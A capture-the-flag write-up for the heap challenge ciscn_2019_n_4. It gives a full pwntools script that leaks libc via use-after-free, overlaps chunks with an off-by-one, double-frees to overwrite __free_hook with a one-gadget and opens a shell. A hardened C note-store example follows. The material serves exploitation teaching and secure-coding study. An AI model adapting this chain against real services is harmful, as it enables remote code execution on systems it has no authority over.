ciscn_2019_n_4

    This challenge has quite a few bugs.

    UAF + off-by-one

    Leak libc through the UAF, use the off-by-one to get overlapping chunks, then double free to hijack __free_hook.

    from pwn import *

    #p=process('./ciscn_2019_n_4')
    p=remote('node3.buuoj.cn',25496)
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
    text='Your choice :'

    # wrappers around the binary's menu options
    def add(size,content):
        p.sendlineafter(':','1')
        p.sendlineafter(' ?',str(size))
        p.sendlineafter('nest?',content)

    def edit(idx,content):
        p.sendlineafter(':','2')
        p.sendlineafter(' :',str(idx))
        p.sendlineafter('nest?',content)

    def show(idx):
        p.sendlineafter(':','3')
        p.sendlineafter('Index :',str(idx))

    def delete(idx):
        p.sendlineafter(':','4')
        p.sendlineafter('Index :',str(idx))

    # chunk 0 is larger than the tcache limit, so freeing it lands in the unsorted bin
    add(0x410,'p')#0
    add(0x10,'p')#1

    # UAF: the freed chunk is still readable through show(), leaking a main_arena pointer
    delete(0)
    add(0x18,'ppppppp')#0
    show(0)
    print(hex(libc.symbols['__malloc_hook']))
    # 1120 is the author's measured offset from the leaked pointer to __malloc_hook (libc 2.27)
    libc.address=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-1120-libc.symbols['__malloc_hook']

    add(0x10,'p')#2
    add(0x10,'p')#3
    add(0x10,'p')#4

    one=libc.address+0x4f322
    free_hook=libc.symbols['__free_hook']
    # off-by-one: the extra byte overwrites the next chunk's size with 0x81 so it overlaps chunks 2 and 3
    edit(0,b'z'*0x10+p64(0x40)+b'\x81')#0
    print(hex(libc.address))
    # free 2 and 3, reallocate over the overlapped region to rewrite the tcache entry,
    # then free again (double free) so the tcache chain points at __free_hook
    delete(2)
    delete(3)
    add(0x71,b'p'*0x18+p64(0x21)+p64(free_hook))#2
    delete(2)
    # first allocation consumes the chain head, the second returns __free_hook; write the one-gadget there
    add(0x10,'p')
    add(0x10,p64(one))
    #gdb.attach(p)
    p.interactive()
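As an added example (constructed here, not the challenge binary and not the author's code), a minimal note store hardened against the two bug classes the chain above relies on: a slot pointer left dangling after free (the UAF and the double free) and an edit that writes one byte past the chunk (the off-by-one). All names are hypothetical.

```c
#include <stdlib.h>
#include <string.h>

/* Constructed note store: fixed slot table, bounded edits, slots cleared on delete. */
#define MAX_NOTES 16
#define MAX_SIZE  0x400

struct note { char *buf; size_t size; };
static struct note notes[MAX_NOTES];

/* Returns the slot index, or -1 when the size is out of range or no slot is free. */
int note_add(size_t size, const char *content, size_t content_len) {
    if (size == 0 || size > MAX_SIZE || content_len > size) return -1;
    for (int i = 0; i < MAX_NOTES; i++) {
        if (notes[i].buf) continue;
        notes[i].buf = calloc(1, size);
        if (!notes[i].buf) return -1;
        memcpy(notes[i].buf, content, content_len);
        notes[i].size = size;
        return i;
    }
    return -1;
}

/* Off-by-one fix: the copy is bounded by the recorded size, never size + 1
 * (the bug pattern is a loop such as `for (i = 0; i <= size; i++)`). */
int note_edit(int idx, const char *content, size_t content_len) {
    if (idx < 0 || idx >= MAX_NOTES || !notes[idx].buf) return -1; /* freed slot rejected */
    if (content_len > notes[idx].size) return -1;
    memcpy(notes[idx].buf, content, content_len);
    return 0;
}

/* UAF / double-free fix: clear the slot so later edit/show/delete on the same
 * index fail instead of touching a chunk that is already back in the allocator. */
int note_delete(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || !notes[idx].buf) return -1;
    free(notes[idx].buf);
    notes[idx].buf = NULL;
    notes[idx].size = 0;
    return 0;
}

/* Returns NULL for an empty or freed slot instead of reading freed memory. */
const char *note_show(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || !notes[idx].buf) return NULL;
    return notes[idx].buf;
}
```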
Original post: https://www.cnblogs.com/pppyyyzzz/p/14514657.html